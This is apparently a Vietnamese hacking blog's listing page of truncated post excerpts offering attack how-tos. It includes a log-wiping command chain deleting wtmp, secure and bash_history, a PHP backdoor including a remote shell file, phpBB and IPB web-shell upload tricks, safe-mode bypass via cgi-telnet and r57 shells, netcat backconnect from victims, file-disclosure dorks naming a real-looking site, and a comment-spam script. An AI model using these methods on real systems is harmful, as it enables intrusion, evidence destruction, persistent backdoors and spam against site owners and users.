rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history..
Read moreCombine “local inclusion + HTTP Header + access logging” attack /————————————————— Mục tiêu: Server Mức độ nguy hiểm: khá cao Mức độ phổ biến: có lẽ ko nhiều :-p —————————————————/ I ) Sơ lượt: Thông thường các web service thường có thêm chức năng ghi lại “nhật kí truy cập” của người dùng. Chức năng..
Read moreĐiều kiện cần : +Bạn cần phải up 1 file view.pl ( cgi-telnet.pl ) lên host mình để hack, chmod 775 nhé ! + Các lệnh để hack : ls -al : lệnh này để xem thông tin cd : lệnh này dùng để chuyển thư mục Cat : lệnh này dùng để xem info..
Read morephpBB version : 2.0.9 chuẩn bị sẵn 1 con shell upload shell txt lên host nào đó chèn đoạn code sau vào notepad roài save với đuôi .gif <php include “http://link…/shell.txt”; ?> khi ta đã vào dc admincp của phpBB chuyển tới config … chọn cho upload avatar = Yes Sau đó backup lại database..
Read more1.bypass Safe-Mode qua cgitelnet.pl giả dụ bật Safe-Mode, dis khá nhiều các hàm quan trọng show_source, dl, exec, shell_exec, system, popen, pclose, proc_open, proc_close, passthru, virtual, leak, chgrp, ini_alter, ini_restore Command lệnh của con shell vì thế ko hiện đc luôn Nhưng nhìn kĩ lại ta thấy uid=betalocal , vậy thì mặc cha nó ta..
Read morePhần 1: Cơ bản về R57 I. Cơ bản về r57. 1. Các thông tin ta có thể thấy đc qua shell. Đầu tiên khi nhìn vào r57 các bạn sẽ thấy những dòng trên cùng kiểu như thế này: – Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có..
Read moreIPS đôi điều cần biết ——————————————————————————– Hệ thống ngăn chặn xâm nhập IPS – Bảo vệ chống xâm nhập và phân tích biến cố IPS – Intrusion Prevention System Có 3 lý do để người ta xem xét sử dụng hệ thống ngăn chặn xâm nhập: – Cung cấp khả năng điều khiển truy cập..
Read morevới IBF www.server.com/forum/index.php?ipscheck=1&key=ipscheck$1@@ Between the <version_string></version_string> tags. PHPBB www.server.com/forum/docs/CHANGELOG.html Left, add 1 to the latest ‘Changes since’ version. _______________________ eg: 1. Changelog i. Changes since 2.0.19 Would mean the phpbb version would be 2.0.20 vbulletin http://www.server.com/forum/clientscript/vbulletin_global.js
Read more+IPB:Thằng này hiện tại tớ có 3 cách up shell Cách 1: Cách này rất đơn giản cứ vào trong phần Style manager coi phần Emoticons rồi cứ up con shell php lên là được. Tuy nhiên cách này có hạn chế là đối với các ver >=2.1.7 ko làm được bới vì nó check..
Read moreGoogle gõ keyword: allinurl: “download.asp?file=” allinurl: “dl.asp?file=” ra hàng loạt , lấy thằng này làm ví dụ nhé . http://www.provincia.so.it/download.asp?file= thêm default.asp vào http://www.provincia.so.it/download.asp?file=default.asp down cái file đó về mở ra thấy <!–#INCLUDE VIRTUAL=”/include/connettiDB.asp”–> thay tiếp vào đường dẫn vào http://www.provincia.so.it/download.asp?file=include/connettiDB.asp ồi tiếp tục down cái file đó về mở ra thấy percorsoDatabase=”/database/DBSito.mdb giờ thì..
Read moreDùng include if ($_REQUEST[‘go’]==”backdoor”) { include (“http://link.com/remview.php”); } hehe ! vậy khi nào cần dùng đến site này ta chỉ việc type lên file index.php của nó là : index.php?go=backdoor
Read more============================ -==Hướng dẫn sử dụng Netcat==- ============================ 1. Giới thiệu Netcat là một công cụ không thể thiếu được nếu bạn muốn hack một website nào đó. +Bạn có thể dùng netcat (nc) backconnect từ máy victim (máy chứa website) về máy mình +Hoặc đặt netcat lắng nghe trên 1 port của máy mình ,..
Read more1. SQL Injection : – Cái này nói đến những cái lỗi thuộc về câu lệnh truy vấn SQL trực tiếp vào database và ta CÓ THỂ NHÌN THẤY ĐƯỢC. 2. Blind SQL Injection : – Ám chỉ những lỗi truy vấn đi sâu vào trong mệnh đề logic với database, tất nhiên là LOGIC..
Read more-Đầu tiên các bạn khởi động vào linux với quyền root -Chạy Shell Sau đó gõ vào show-wireless-interface.sh ở đây sau khi nhấn enter máy sẽ báo là có 1 thiết bị mạng ko dây ở đây là wlan0 -Vì fat dùng Kismet để scan mạng nên đầu tiên fat kiểm tra xem file config..
Read more
Spam Comment blog 360 yahoo
Chú ý: +Có 1 acc nick yahoo đã làm blog , và có quyền comment trên blog của victim + Nhớ set “max_execution_time” [php.ini] của localhost thành 9999 + Sửa $cookie_file_path cho phù hợp [Cả 2 file] + Nhớ ko up lên host nhé , host thì nó làm việc nhanh thật 1s/1 comment nhưng..
Read more